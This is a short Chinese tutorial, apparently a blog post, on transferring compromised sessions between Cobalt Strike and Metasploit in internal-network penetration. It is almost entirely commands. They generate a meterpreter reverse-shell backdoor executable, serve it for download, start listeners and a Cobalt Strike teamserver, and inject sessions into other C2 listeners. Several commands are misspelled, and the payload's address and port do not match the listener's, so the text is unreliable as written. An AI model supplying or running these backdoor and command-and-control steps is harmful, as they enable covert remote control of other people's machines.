使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。
一、Cobalt Strike连接MSF会话
1. 上线msf会话
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe
2. python开启web服务,下载木马
python3 -m http.server 80
3. msf进行监听模式
msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run
运行木马反弹shell
4. 开启Cobalt Strike
./teamserver 10.10.10.128 123456
客户端连接后,添加一个监听
5. 会话转移到CS上
backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run
二、MSF连接Cobalt Strike会话
1. 添加一个监听,生成一个木马程序
2. 重新添加一个监听器
3. 会话转义到MSF
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit